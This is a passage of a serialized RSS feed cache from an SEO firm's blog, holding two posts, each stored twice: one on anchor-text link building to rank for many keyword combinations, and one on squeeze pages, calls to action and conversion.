software of check out <a href=\"http://www.nichewatch.com/\">Niche Watch</a> and see where you stand using a before and after methodology. </p>\n<p>Every site is different, but say for example you have a PR6 site, you can skip most of these tactics and just put a keyword in your title tag, mention it a few times, build links from your own site to itself and dominate the SERPs. However, since we know that you are going to be challenging websites such as those in the SERPs as you step over them in concentration for allinanchor relevance as you specifically augment your site by fortifying it with keyword combinations, you can actually surpass a lazy or passive higher page rank site in this fashion. </p>\n<p>Our site for example can chip away and rise approximately 100,000 results per month for competitive terms using moderate link building methods (1000-2000 quality inbound links per month for example), so if we were going after a super competitive keyword such as <a href=\"http://www.google.com/search?hl=en&amp;client=firefox-a&amp;rls=org.mozilla%3Aen-US%3Aofficial&amp;hs=4gI&amp;q=%22seo+company%22&amp;btnG=Search\">&#8220;SEO Company&#8221;</a> for example with it&#8217;s 1.4 million results, it would take roughly 1 year to build links to get to the top 10 using this tactic. </p>\n<p>Each site is different as the authority that results from each link varies. The point here is, each website has a link velocity ratio that is consistent with how aggressively it can move up the rungs until it arrives in the top 10 search results for a keyword &#8220;in quotes&#8221;.</p>\n<p>If you wanted to find out where you stand for the keyword in advance, you could always click your url first, then use the search command <a href=\"http://www.google.com/ie?&amp;num=100\">www.google.com/ie?&amp;num=100</a> to get to the 100 results per page stripped down Google interface. From there (since you have clicked your link in advance) you can put the keyword in question &#8220;in quotes&#8221;, hit return and find out where you stand. </p>\n<p>If you are position #200 for example and you are building links for every word that comprises the phrase (services SEO, SEO Services, Search engine Optimization Services, Engine Optimization SEO, etc.) then you should see your ranking move up and up closer to the top 10 for a number of terms. </p>\n<p>When it hits the top 10 for the allinanchor: terms, if the keyword is not being challenged directly by another competitor your site should hit the top 10 as well. If there is competition you should be in the top 30 or top 20 results and you will have to figure out which other SEO factor <a href=\"http://seodesignsolutions.com/blog/seo-web-design/are-your-seo-on-page-factors-holding-you-back/\">is holding you back</a> from there.</p>\n<p>If you wanted to be more specific and chart your progress, you can find the link to link velocity ratio to determine how many links or how much time it will take you to crack into the top 10 for each of the respective search terms.  Or you could find the best page for each link using the Google command site:www.yoursite.com keyword, to increase the links per page (<a href=\"http://seodesignsolutions.com/blog/search-engine-optimization/link-building-deep-links-using-the-lpp-ratio/\">LPP ratio</a>) as a deep linking strategy to increase the impact of each link (don&#8217;t forget to socially bookmark them as well for an added boost).</p>\n<p>This is how you get your rankings to spread out to other terms. *If you use exact match terms for two word key phrases, then you can see the results usually within a week. The idea is, start with three words, when you see them moving, then alternate one of the keywords with another word from your list from before. So you can rank for keyword keyword company, keyword keyword services, keyword keyword professional, etc.</p>\n<p>Examples like SEO Marketing Consultant, SEO Website Marketing, Internet SEO Marketing, etc&#8230; this will become apparent later just how effective this tactic can be for blanketing a plethora of terms. </p>\n<p>Then you focus specifically on the phrase you want to rank for, create a custom page using a keyword density tool or writing copy that utilizes the phrase one time in the title, one time in the h1 tag, one to 3 times in the document and continue to build links to that page with those keywords in the anchor text. This is the advantage of having a blog as you can camouflage your link building tactics under the guise of an informative post. I will just hint at SEO content copy writing here, but you get the gist (link bait, social media, social bookmarking / link building ahem, ahem).</p>\n<p>My suggestion, build 50 links to the page and move on to another term. Then give it a week or two and go back and <a href=\"http://www.nichewatch.com/\">check the status of the keywords</a> and how your allinanchor:, allintitle: and allintext: ratio&#8217;s are performing is contrast to the keyword combinations, make note of your progress and try to find your site in the SERPs again. You can go back to the Google interface and check or you can just scroll through the normal results to see where you stand.</p>\n<p>If the keywords you select are under 20,000 results, if your site has some authority you can take those over from just posting an <a href=\"http://seodesignsolutions.com/blog/search-engine-optimization/titles-and-tagging-for-seo-conversion-relevance/\">on topic post that is tagged properly</a> in your blog. But to sustain them, you have to feed the pages keyword combinations to keep them afloat in the SERPs. This also provides a cushion around them to help fend off competition from leap-frogging past you up the ladder.</p>\n<p>Acquisition (climbing the rungs) and defense from others can be done through varying the tactic slightly. Slow down once you have acquired a top 20 and let the link velocity push you up the ladder. Then you can build 1/3 of the links using the exact match terms until you hit the top 10. If you crack the top 10, then go back, add a few more occurrences of the keywords you want to rank for in your document/page. Add a few more links, wait a week and then see if that pushes you over the hump into the top 5.</p>\n<p>This method may seem a bit chaotic, but you get the gist, you can manage one keyword or several at the same time. The key is to use a common denominator as the pivotal term that is used to tie together all of the variations of the word stemmed singular, plural and adjective based keyword combinations until you have effectively saturated each keywords density in the external links to your site.</p>\n<p>You can always check on Google Webmaster tools which keywords have the highest occurrences that are directed at your site. The idea is, to build a base term, add a qualifier, then do this again and again, until all of your main keywords are essentially lodged in the anchor text pointing at your site from a wide variety of unique and Class C- IP addresses.</p>\n<p>For example if you did a search on a term like &#8220;seo professional&#8221; this term returns 126,000 results. If your site has a PR4 for example and you have content that supports this type of industry of jargon in your domain name, on your pages or in your page titles, you should already have some leverage for the term.</p>\n<p>Terms that have slight correlation to your site&#8217;s theme can be optimized, but the rate of which all depends on your website authority, the links you use and how much link juice they carry, where you point them, the competition and how algorithms see your link building techniques (natural or unnatural) if you invoke a penalty, you will not rank for that term for a while until it&#8217;s lifted, so it&#8217;s better not to get greedy and vary your titles, anchor text and pages when deep linking.</p>\n<p>I hope you found this information useful, if you did, then cast your vote to share it, sign up for the RSS feed or just enjoy&#8230;See you in the SERPs.</p>\n<div class=\"feedflare\">\n<a href=\"http://feeds.seodesignsolutions.com/~ff/SeoDesignSolutionsBlog?a=fMke79EeF5s:vRkBGj361aA:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/SeoDesignSolutionsBlog?d=yIl2AUoC8zA\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/SeoDesignSolutionsBlog/~4/fMke79EeF5s\" height=\"1\" width=\"1\" alt=\"\"/>\";}s:11:\"description\";s:508:\"In case you were wondering how to systematically achieve saturation for multiple keywords for your website in search engines (instead of just a few) using SEO, then this is a must read post. This tactic is specifically designed to work in Google using the allinanchor / keyword relevance ratio to back links pointing at your <a href=\"http://www.seodesignsolutions.com/blog/search-engine-optimization/how-to-build-links-and-optimize-your-website-for-multiple-keywords/\" class=\"read-more-excerpt\">Read More</a>\";s:3:\"wfw\";a:1:{s:10:\"commentrss\";s:138:\"http://www.seodesignsolutions.com/blog/search-engine-optimization/how-to-build-links-and-optimize-your-website-for-multiple-keywords/feed/\";}s:5:\"slash\";a:1:{s:8:\"comments\";s:2:\"58\";}s:10:\"feedburner\";a:1:{s:8:\"origlink\";s:133:\"http://www.seodesignsolutions.com/blog/search-engine-optimization/how-to-build-links-and-optimize-your-website-for-multiple-keywords/\";}s:7:\"summary\";s:508:\"In case you were wondering how to systematically achieve saturation for multiple keywords for your website in search engines (instead of just a few) using SEO, then this is a must read post. This tactic is specifically designed to work in Google using the allinanchor / keyword relevance ratio to back links pointing at your <a href=\"http://www.seodesignsolutions.com/blog/search-engine-optimization/how-to-build-links-and-optimize-your-website-for-multiple-keywords/\" class=\"read-more-excerpt\">Read More</a>\";s:12:\"atom_content\";s:14799:\"<p>In case you were wondering how to systematically achieve saturation for <strong>multiple keywords</strong> for your website in search engines (instead of just a few) using <a href=\"http://www.seodesignsolutions.com/\">SEO</a>, then this is a must read post. This tactic is specifically designed to work in Google using the allinanchor / keyword relevance ratio to back links pointing at your site.<br />\n<a href=\"http://seodesignsolutions.com/blog/search-engine-optimization/how-to-build-links-and-optimize-your-website-for-multiple-keywords/\"><img src=\"http://seodesignsolutions.com/blog/wp-content/uploads/2008/11/multiple-keywords.jpg\" alt=\"\" title=\"Optimizing Multiple Keywords\" width=\"400\" height=\"275\" class=\"aligncenter size-full wp-image-617\" srcset=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2008/11/multiple-keywords.jpg 400w, http://www.seodesignsolutions.com/blog/wp-content/uploads/2008/11/multiple-keywords-300x206.jpg 300w\" sizes=\"(max-width: 400px) 100vw, 400px\" /></a><br />\nThis is the point where the competition gets nervous as a tactic like this could go viral with just one post from a popular Stumbler, Digg or otherwise. I will leave that at your discretion to cast your vote, but this is not the first time where I should have simply shut up, but I thought I would leave you with some good reading material for the weekend.<span id=\"more-93\"></span></p>\n<p>As an <a href=\"http://www.seodesignsolutions.com/seo/\">SEO</a> company involved in this illustrious industry, I feel like we owe those sincere seekers who yearn for legitimate <a href=\"http://www.seodesignsolutions.com\">SEO</a> techniques and only find dozens of sites with shallow posts, vague references and theory. I don&#8217;t mind sharing a few tactics here and there about <a href=\"http://seodesignsolutions.com/blog/how-to-reference-material/optimizing-your-website-for-multiple-keywords/\">keyword optimization</a>, as the tendency to create, test and implement them typically happens faster than I can write them down. </p>\n<p>This post in essence serves as a web-log of a fundamental technique, that we have used time and time again to bolster <a href=\"http://www.seodesignsolutions.com/seo-services.html\">multiple top 10 positions</a> in search engines.  Naturally, we have to hold back something, otherwise we would make the SEO community obsolete, but in any case, these tactics are what we use when targeting an entire industry for long tail search engine domination, they can also be used for more aggressive/competitive terms by <a href=\"http://seodesignsolutions.com/blog/link-building/should-you-build-links-for-competitive-terms-or-the-long-tail-of-search/\">using this tactic</a>. </p>\n<p>But, in the even that you wish to rank in the top 10 for a result that has 1.2 &#8211; 1.8 million results, you can essentially pick them off like flies using just a fragment of this technique. The terms we consider worthy are usually the ones that takes months to acquire. So, don&#8217;t build links to fast from off topic locations, it&#8217;s better to focus on quality vs. quantity, however having a diverse base of IP addresses to use is ideal (such as an article marketing resource box that you can moderate) Hmmmmm. </p>\n<p><strong>The exercise:</strong></p>\n<p>1. First start off by writing down every possible singular keyword that pertains to your industry. From there narrow it down to the top 20-30 terms. </p>\n<p>You could also just use a keyword discovery tool, but in this instance, think like a consumer trying to reach your site. The reason is, many of the search terms used to reach your site are unique and do not fall into realm of showing up on the &#8220;keyword radar&#8221;, so common sense can equal conversion if you pick the right phrase and beat your competition to the punch.</p>\n<p>2. Then after you have a list of 20-30, start combining two word combinations strategically using the premise of how you think someone may type a query into a search engine.</p>\n<p>web page optimization, optimize my website, how do I SEO my site, etc&#8230; come up with your wild card list of key phrases which you can have fun with later, since if you optimize your site for one group of keywords ALL OF THE KEYWORDS in the anchor text get a boost. So even though you may be <a href=\"http://www.seodesignsolutions.com/link-submissions-services.html\">building links</a> using exact match, you still get the benefit of each individual word in Google.</p>\n<p>3. After you have your list of 30 singular, 20 two-word combinations and 10 or so three-word combinations (just seeing if you were paying attention, since I didn&#8217;t say anything about the 3 word combinations) take each of the two and three word combinations, place the phrases &#8220;in quotes&#8221; and enter them in a standard Google search query one at a time. </p>\n<p>Look at the results of the keywords in quotes and this will give you a good indication of the allinanchor and allintitle relevance by using the quotes. Usually if you do this, you can remove the quotes and 90% of the sites remain the same. Without quotes it may be 1-10 of 2,000,000 results, with &#8220;the quotes&#8221; it may show 1-10 of 20,000. It is the term in quotes you want to look at in order to gain a metric on the competitiveness of this key phrase.</p>\n<p>Also, the more words you add, the easier it is to optimize, even if the chronology of the words does not make sense, you are still optimizing your site for any combination of keywords that are contained in the anchor text. In case it&#8217;s a new term, <a href=\"http://seodesignsolutions.com/blog/seo-marketing/how-to-use-article-marketing-for-building-links-traffic-seo-visibility/\">this is anchor text</a>, so use it wisely as it is your number 1 tool for developing links, relevance and rankings (for now at least) in Google.</p>\n<p>Getting back to the exercise, if the term comes back with under 100,000 results then move it into your to do list of links to build as a likely target for your SEO. Granted that this is merely one tactic, feel free to combine it with your own methods. Now, without giving away too many secrets, you will be responsible for finding ways to build links. </p>\n<p>Not just any links, but links that allow you to have control over the anchor text (the text in the link). Use these terms to whittle away at the root phrases building 100 links per keyword combination, then run analytics software of check out <a href=\"http://www.nichewatch.com/\">Niche Watch</a> and see where you stand using a before and after methodology. </p>\n<p>Every site is different, but say for example you have a PR6 site, you can skip most of these tactics and just put a keyword in your title tag, mention it a few times, build links from your own site to itself and dominate the SERPs. However, since we know that you are going to be challenging websites such as those in the SERPs as you step over them in concentration for allinanchor relevance as you specifically augment your site by fortifying it with keyword combinations, you can actually surpass a lazy or passive higher page rank site in this fashion. </p>\n<p>Our site for example can chip away and rise approximately 100,000 results per month for competitive terms using moderate link building methods (1000-2000 quality inbound links per month for example), so if we were going after a super competitive keyword such as <a href=\"http://www.google.com/search?hl=en&amp;client=firefox-a&amp;rls=org.mozilla%3Aen-US%3Aofficial&amp;hs=4gI&amp;q=%22seo+company%22&amp;btnG=Search\">&#8220;SEO Company&#8221;</a> for example with it&#8217;s 1.4 million results, it would take roughly 1 year to build links to get to the top 10 using this tactic. </p>\n<p>Each site is different as the authority that results from each link varies. The point here is, each website has a link velocity ratio that is consistent with how aggressively it can move up the rungs until it arrives in the top 10 search results for a keyword &#8220;in quotes&#8221;.</p>\n<p>If you wanted to find out where you stand for the keyword in advance, you could always click your url first, then use the search command <a href=\"http://www.google.com/ie?&amp;num=100\">www.google.com/ie?&amp;num=100</a> to get to the 100 results per page stripped down Google interface. From there (since you have clicked your link in advance) you can put the keyword in question &#8220;in quotes&#8221;, hit return and find out where you stand. </p>\n<p>If you are position #200 for example and you are building links for every word that comprises the phrase (services SEO, SEO Services, Search engine Optimization Services, Engine Optimization SEO, etc.) then you should see your ranking move up and up closer to the top 10 for a number of terms. </p>\n<p>When it hits the top 10 for the allinanchor: terms, if the keyword is not being challenged directly by another competitor your site should hit the top 10 as well. If there is competition you should be in the top 30 or top 20 results and you will have to figure out which other SEO factor <a href=\"http://seodesignsolutions.com/blog/seo-web-design/are-your-seo-on-page-factors-holding-you-back/\">is holding you back</a> from there.</p>\n<p>If you wanted to be more specific and chart your progress, you can find the link to link velocity ratio to determine how many links or how much time it will take you to crack into the top 10 for each of the respective search terms.  Or you could find the best page for each link using the Google command site:www.yoursite.com keyword, to increase the links per page (<a href=\"http://seodesignsolutions.com/blog/search-engine-optimization/link-building-deep-links-using-the-lpp-ratio/\">LPP ratio</a>) as a deep linking strategy to increase the impact of each link (don&#8217;t forget to socially bookmark them as well for an added boost).</p>\n<p>This is how you get your rankings to spread out to other terms. *If you use exact match terms for two word key phrases, then you can see the results usually within a week. The idea is, start with three words, when you see them moving, then alternate one of the keywords with another word from your list from before. So you can rank for keyword keyword company, keyword keyword services, keyword keyword professional, etc.</p>\n<p>Examples like SEO Marketing Consultant, SEO Website Marketing, Internet SEO Marketing, etc&#8230; this will become apparent later just how effective this tactic can be for blanketing a plethora of terms. </p>\n<p>Then you focus specifically on the phrase you want to rank for, create a custom page using a keyword density tool or writing copy that utilizes the phrase one time in the title, one time in the h1 tag, one to 3 times in the document and continue to build links to that page with those keywords in the anchor text. This is the advantage of having a blog as you can camouflage your link building tactics under the guise of an informative post. I will just hint at SEO content copy writing here, but you get the gist (link bait, social media, social bookmarking / link building ahem, ahem).</p>\n<p>My suggestion, build 50 links to the page and move on to another term. Then give it a week or two and go back and <a href=\"http://www.nichewatch.com/\">check the status of the keywords</a> and how your allinanchor:, allintitle: and allintext: ratio&#8217;s are performing is contrast to the keyword combinations, make note of your progress and try to find your site in the SERPs again. You can go back to the Google interface and check or you can just scroll through the normal results to see where you stand.</p>\n<p>If the keywords you select are under 20,000 results, if your site has some authority you can take those over from just posting an <a href=\"http://seodesignsolutions.com/blog/search-engine-optimization/titles-and-tagging-for-seo-conversion-relevance/\">on topic post that is tagged properly</a> in your blog. But to sustain them, you have to feed the pages keyword combinations to keep them afloat in the SERPs. This also provides a cushion around them to help fend off competition from leap-frogging past you up the ladder.</p>\n<p>Acquisition (climbing the rungs) and defense from others can be done through varying the tactic slightly. Slow down once you have acquired a top 20 and let the link velocity push you up the ladder. Then you can build 1/3 of the links using the exact match terms until you hit the top 10. If you crack the top 10, then go back, add a few more occurrences of the keywords you want to rank for in your document/page. Add a few more links, wait a week and then see if that pushes you over the hump into the top 5.</p>\n<p>This method may seem a bit chaotic, but you get the gist, you can manage one keyword or several at the same time. The key is to use a common denominator as the pivotal term that is used to tie together all of the variations of the word stemmed singular, plural and adjective based keyword combinations until you have effectively saturated each keywords density in the external links to your site.</p>\n<p>You can always check on Google Webmaster tools which keywords have the highest occurrences that are directed at your site. The idea is, to build a base term, add a qualifier, then do this again and again, until all of your main keywords are essentially lodged in the anchor text pointing at your site from a wide variety of unique and Class C- IP addresses.</p>\n<p>For example if you did a search on a term like &#8220;seo professional&#8221; this term returns 126,000 results. If your site has a PR4 for example and you have content that supports this type of industry of jargon in your domain name, on your pages or in your page titles, you should already have some leverage for the term.</p>\n<p>Terms that have slight correlation to your site&#8217;s theme can be optimized, but the rate of which all depends on your website authority, the links you use and how much link juice they carry, where you point them, the competition and how algorithms see your link building techniques (natural or unnatural) if you invoke a penalty, you will not rank for that term for a while until it&#8217;s lifted, so it&#8217;s better not to get greedy and vary your titles, anchor text and pages when deep linking.</p>\n<p>I hope you found this information useful, if you did, then cast your vote to share it, sign up for the RSS feed or just enjoy&#8230;See you in the SERPs.</p>\n<div class=\"feedflare\">\n<a href=\"http://feeds.seodesignsolutions.com/~ff/SeoDesignSolutionsBlog?a=fMke79EeF5s:vRkBGj361aA:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/SeoDesignSolutionsBlog?d=yIl2AUoC8zA\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/SeoDesignSolutionsBlog/~4/fMke79EeF5s\" height=\"1\" width=\"1\" alt=\"\"/>\";}i:3;a:13:{s:5:\"title\";s:63:\"How to Get SEO, Call to Action and Conversion on the Same Page!\";s:4:\"link\";s:77:\"http://feeds.seodesignsolutions.com/~r/SeoDesignSolutionsBlog/~3/WawDDa-5Yn0/\";s:8:\"category\";s:110:\"SEO Marketingcall-to-actionHigher-Sales-ConversionProblem-Solution-MarketingSEO-&-Squeeze-PagesWhat-SEO-is-NOT\";s:2:\"dc\";a:1:{s:7:\"creator\";s:13:\"Jeffrey_Smith\";}s:7:\"pubdate\";s:29:\"Mon, 01 May 2017 10:02:55 PDT\";s:4:\"guid\";s:120:\"http://www.seodesignsolutions.com/blog/seo-marketing/how-to-get-your-seo-call-to-action-and-conversion-on-the-same-page/\";s:7:\"content\";a:1:{s:7:\"encoded\";s:10528:\"<p><a href=\"http://www.seodesignsolutions.com\">SEO</a> is nice for popularity, but <strong>conversion is even better</strong>. So, before you go out and start snatching up more keywords than you can shake a stick at, make sure your offer is up to the challenge of enlivening customer attention and encouraging viewer retention. Otherwise, your marketing efforts will be a mere exercise in futility.</p>\n<p><a href=\"http://www.seodesignsolutions.com/blog/seo-marketing/how-to-get-your-seo-call-to-action-and-conversion-on-the-same-page/\"><img src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2007/12/seo-and-conversion.jpg\" alt=\"seo and conversion\" width=\"400\" height=\"265\" class=\"aligncenter size-full wp-image-9645\" srcset=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2007/12/seo-and-conversion.jpg 400w, http://www.seodesignsolutions.com/blog/wp-content/uploads/2007/12/seo-and-conversion-300x199.jpg 300w\" sizes=\"(max-width: 400px) 100vw, 400px\" /></a></p>\n<p><strong>Are you playing it safe with keyword blinders?, or have you diversified your Search Terms?</strong></p>\n<p>It&#8217;s better to be safe than sorry as a result of <strong>&#8220;having blinders on&#8221;</strong> when it comes to <a href=\"http://seodesignsolutions.com/blog/search-engine-optimization/\">search engine optimization</a> and selecting the best keywords for your offer. Instead of thinking in terms of &#8220;the money phrase&#8221;, or, <strong>as soon as I hit the top 10</strong> for &#8220;my ultimate competitive keyword&#8221;, that floodgates of website traffic will open, sales will inundate our sales team and we will have to hire 20 people to scale our sales department to keep up with the surge of orders and traffic. This is not to say that things like this do not happen, they do, but rarely as a result of one keyword alone.<br />\n<span id=\"more-105\"></span></p>\n<p><strong>Don&#8217;t believe keyword hype</strong></p>\n<p>The misconception typically originates as a result of assumption, or misinformation gleaned from data mining tools / keyword research tools (it says this phrase gets 20,000 hits per month, so it must), which is understandable. I can assure you, we have dominated multiple rankings in top 10 competitive keywords with double organic listings, only to be disappointed by the lack of traffic that resulted. Yet, on the other hand, been completely surprised when you write  or optimize something (supposedly less competitive) and experience surges of traffic for weeks from one keyword you may or may not have expected.  </p>\n<p>It is important to be clear <strong>what search engine optimization is not</strong>, in order to know what it truly is. <strong>SEO is not the answer to conversion</strong>, it is just a tool to rouse the masses to investigate your offer, but ultimately the responsibility lies within the realm of the individual or individuals structuring the offer, to determine just what the anticipated end result will be.</p>\n<p><strong>Are your Pages Eye Candy? or do they Own a Focus</strong></p>\n<p>The internet is full of hungry eyes with agile minds attached, so many in fact, that your pages may just be another snack along the way. In order to change the menu and make your site <strong>&#8220;the main course&#8221;</strong>, nine times out of ten, some changes need to occur to make the transition from pages with an idle online existence to a page that for lack of better terms, offers you a deal you can&#8217;t refuse.</p>\n<p><strong>What Can You Learn (and apply to your own site) from a Squeeze Page</strong></p>\n<p><strong>First, the headline</strong> &#8211; <a href=\"http://seodesignsolutions.com/blog/small-business-marketing/action-words-and-conversion/\">Call to Action and Conversion</a> Starts Here. When you look at a typical squeeze page, once you get there, there is no question what the page is about, in fact they make it hard to see anything other than what the topical relevance is when you first set eyes on the page, but why? Because the headline takes up 25% of the screen, is usually in a ridiculously loud color, with quotes and highlighted in yellow. Anyone who fails at that point to surmise what the contextual relevance is for being there, should have their internet license suspended for surfing blind without emotional attachment. </p>\n<p>In any case, the point being, the pages, despite how obnoxious they are serve a very fundamental purpose, which is to set the tone and funnel the reader&#8217;s attention to the meat and potatoes of the document (typically found at the very bottom alongside a pay pal purchase button). This is were the old adage of (A.I.D.A) attention, interest, desire, action comes into play in it&#8217;s sublime simplicity. </p>\n<p><strong>Next, the testimonial</strong>, but why? Because they know you are skeptical and they know they need to subvert your defenses in order to engage the rational mind behind the emotional response when you shop (do I need this or do I want this, can I ignore or suppress the urge to purchase, or am I genuinely interested) all the while thousands of queries such as this race through the subconscious and either lead your to (a) move along (b) read further, since your there or (c) take the plunge and purchase, because, what the hay, it&#8217;s only money right.</p>\n<p><strong>Next, the problem / solution</strong>, which is usually built on the premise of using questions to preface it&#8217;s significance. Are you tired of? &#8220;the problem&#8221; Do you get frustrated when? Now you can be free of, by using our super duper X,Y,Z solution for mere chump change (only $39.95) for the ultimate answer to your prayers. </p>\n<p>O.k, so I was a bit over the top, but I&#8217;m sure it&#8217;s not the first time you have seen this pitch,  purchased or nearly purchased something as a result of it. Most of us are conditioned not to respond to such an overtly obvious pitch, however, I must admit, I am an impulse shopper and randomly purchase e-books in this fashion and never get around to reading them (the ideal customer for squeeze pages).</p>\n<p><strong>Then, the close,</strong> here is where they hit you with information about the product or service with the focus is on the &#8220;how you can benefit&#8221; mentality and inevitably the call to action, ORDER NOW!, ORDER TODAY, ORDER IN THE NEXT 5 MINUTES AND RECEIVE A FREE &#8220;rubber ducky, widget,etc.&#8221;, once again, it&#8217;s all about conversion.</p>\n<p>Sure that page may get 1000 visitors that day, and from that 1000 visitors <strong>100 order</strong>, that is more than enough to offset the other 900 that did not, so you can see the beauty in their plan. Pages like this could teach a great deal to businesses seeking conversion for their efforts instead of just visitors window shopping and burning up bandwidth, and I must admit even our pages in the main site need to take the positive benefits from such a blatant business model. The squeeze page is just that, a page that funnels their attention to a conclusion and then compels them to take action.</p>\n<p><strong>Have you heard of Funneling Attention for Higher Conversions? </strong></p>\n<p>Business models that make money are using the funneling tactic to amass massive amounts of income, using a tried and true / simplistic theme. Even though is mainly has it&#8217;s place in direct sales, affiliate programs, sales for e-books or inexpensive items. I have seen this tactic used for offers in the thousands and still convert readers (it just took more filler in the middle to build the argument and present the solution). Getting back to the basis of this article, the conclusion is SEO does not ensure conversion, it merely sets the stage.</p>\n<p>Branding is one thing, but how many people are online just for the sake of saying &#8221; I am the number one brand for industry X&#8221;, perhaps this is important for corporate America, sure, but,for the rest of us out here trying to make ends meet, we need conversion in some way shape or form.</p>\n<p>Knowing this, instead of thinking narrow when it comes to using SEO, one could opt for a more holistic approach whereby they identify the behavior of the types of clients they would like to attract, thinking of individuals as opposed to demographics from a one dimensional prospective. If you think holistically, you can cover your bases and <a href=\"http://seodesignsolutions.com/blog/search-engine-optimization/are-you-google-sighted-or-can-you-see-the-big-picture-of-search/\">optimize entire segments of the niche</a> as well as use multiple tactics and search engines to draw traffic from a variety of queries and implement &#8220;attention and retention insurance&#8221; for all of your respective offers. </p>\n<p>For example, instead of one or two phrases, why not have twenty instead, it essentially takes about the same amount of effort and can be accomplished through modifying slight variations of content and <a href=\"http://seodesignsolutions.com/blog/search-engine-optimization/how-to-build-links-and-optimize-your-website-for-multiple-keywords/\">how your build links</a>.</p>\n<p>Just having a top 10 ranking does not ensure traffic, simply because, not all keywords convert! It truly is sad to see so many people just scratching the surface for topical relevance, when in reality mosts sites are capable of acquiring heightened depth (for readership) and conversion and could achieve 400% more times the amount of traffic from just applying rudimentary steps to lead people through the &#8220;expected action for that page&#8221;. But, they have to get there first, so my suggestion in a nutshell is, to <strong>optimize root phrases with pertinent keywords</strong> instead of simple &#8220;exact match key phrases&#8221;, use strong internal links to get viewers deeper into the site and use graphics or video&#8217;s to cut the bounce rates in half.</p>\n<p>We will continue along these lines for the next few days and covering topics related to SEO, conversion, structuring your offer and how the way you craft your content, ultimately impacts the bottom line. Stay tuned for the next post&#8230;</p>\n<div class=\"feedflare\">\n<a href=\"http://feeds.seodesignsolutions.com/~ff/SeoDesignSolutionsBlog?a=WawDDa-5Yn0:cNEDoVaKCcc:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/SeoDesignSolutionsBlog?d=yIl2AUoC8zA\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/SeoDesignSolutionsBlog/~4/WawDDa-5Yn0\" height=\"1\" width=\"1\" alt=\"\"/>\";}s:11:\"description\";s:491:\"SEO is nice for popularity, but conversion is even better. So, before you go out and start snatching up more keywords than you can shake a stick at, make sure your offer is up to the challenge of enlivening customer attention and encouraging viewer retention. Otherwise, your marketing efforts will be a mere exercise in <a href=\"http://www.seodesignsolutions.com/blog/seo-marketing/how-to-get-your-seo-call-to-action-and-conversion-on-the-same-page/\" class=\"read-more-excerpt\">Read More</a>\";s:3:\"wfw\";a:1:{s:10:\"commentrss\";s:125:\"http://www.seodesignsolutions.com/blog/seo-marketing/how-to-get-your-seo-call-to-action-and-conversion-on-the-same-page/feed/\";}s:5:\"slash\";a:1:{s:8:\"comments\";s:2:\"35\";}s:10:\"feedburner\";a:1:{s:8:\"origlink\";s:120:\"http://www.seodesignsolutions.com/blog/seo-marketing/how-to-get-your-seo-call-to-action-and-conversion-on-the-same-page/\";}s:7:\"summary\";s:491:\"SEO is nice for popularity, but conversion is even better. So, before you go out and start snatching up more keywords than you can shake a stick at, make sure your offer is up to the challenge of enlivening customer attention and encouraging viewer retention. Otherwise, your marketing efforts will be a mere exercise in <a href=\"http://www.seodesignsolutions.com/blog/seo-marketing/how-to-get-your-seo-call-to-action-and-conversion-on-the-same-page/\" class=\"read-more-excerpt\">Read More</a>\";s:12:\"atom_content\";s:10528:\"<p><a href=\"http://www.seodesignsolutions.com\">SEO</a> is nice for popularity, but <strong>conversion is even better</strong>. So, before you go out and start snatching up more keywords than you can shake a stick at, make sure your offer is up to the challenge of enlivening customer attention and encouraging viewer retention. Otherwise, your marketing efforts will be a mere exercise in futility.</p>\n<p><a href=\"http://www.seodesignsolutions.com/blog/seo-marketing/how-to-get-your-seo-call-to-action-and-conversion-on-the-same-page/\"><img src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2007/12/seo-and-conversion.jpg\" alt=\"seo and conversion\" width=\"400\" height=\"265\" class=\"aligncenter size-full wp-image-9645\" srcset=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2007/12/seo-and-conversion.jpg 400w, http://www.seodesignsolutions.com/blog/wp-content/uploads/2007/12/seo-and-conversion-300x199.jpg 300w\" sizes=\"(max-width: 400px) 100vw, 400px\" /></a></p>\n<p><strong>Are you playing it safe with keyword blinders?, or have you diversified your Search Terms?</strong></p>\n<p>It&#8217;s better to be safe than sorry as a result of <strong>&#8220;having blinders on&#8221;</strong> when it comes to <a href=\"http://seodesignsolutions.com/blog/search-engine-optimization/\">search engine optimization</a> and selecting the best keywords for your offer. Instead of thinking in terms of &#8220;the money phrase&#8221;, or, <strong>as soon as I hit the top 10</strong> for &#8220;my ultimate competitive keyword&#8221;, that floodgates of website traffic will open, sales will inundate our sales team and we will have to hire 20 people to scale our sales department to keep up with the surge of orders and traffic. This is not to say that things like this do not happen, they do, but rarely as a result of one keyword alone.<br />\n<span id=\"more-105\"></span></p>\n<p><strong>Don&#8217;t believe keyword hype</strong></p>\n<p>The misconception typically originates as a result of assumption, or misinformation gleaned from data mining tools / keyword research tools (it says this phrase gets 20,000 hits per month, so it must), which is understandable. I can assure you, we have dominated multiple rankings in top 10 competitive keywords with double organic listings, only to be disappointed by the lack of traffic that resulted. Yet, on the other hand, been completely surprised when you write  or optimize something (supposedly less competitive) and experience surges of traffic for weeks from one keyword you may or may not have expected.  </p>\n<p>It is important to be clear <strong>what search engine optimization is not</strong>, in order to know what it truly is. <strong>SEO is not the answer to conversion</strong>, it is just a tool to rouse the masses to investigate your offer, but ultimately the responsibility lies within the realm of the individual or individuals structuring the offer, to determine just what the anticipated end result will be.</p>\n<p><strong>Are your Pages Eye Candy? or do they Own a Focus</strong></p>\n<p>The internet is full of hungry eyes with agile minds attached, so many in fact, that your pages may just be another snack along the way. In order to change the menu and make your site <strong>&#8220;the main course&#8221;</strong>, nine times out of ten, some changes need to occur to make the transition from pages with an idle online existence to a page that for lack of better terms, offers you a deal you can&#8217;t refuse.</p>\n<p><strong>What Can You Learn (and apply to your own site) from a Squeeze Page</strong></p>\n<p><strong>First, the headline</strong> &#8211; <a href=\"http://seodesignsolutions.com/blog/small-business-marketing/action-words-and-conversion/\">Call to Action and Conversion</a> Starts Here. When you look at a typical squeeze page, once you get there, there is no question what the page is about, 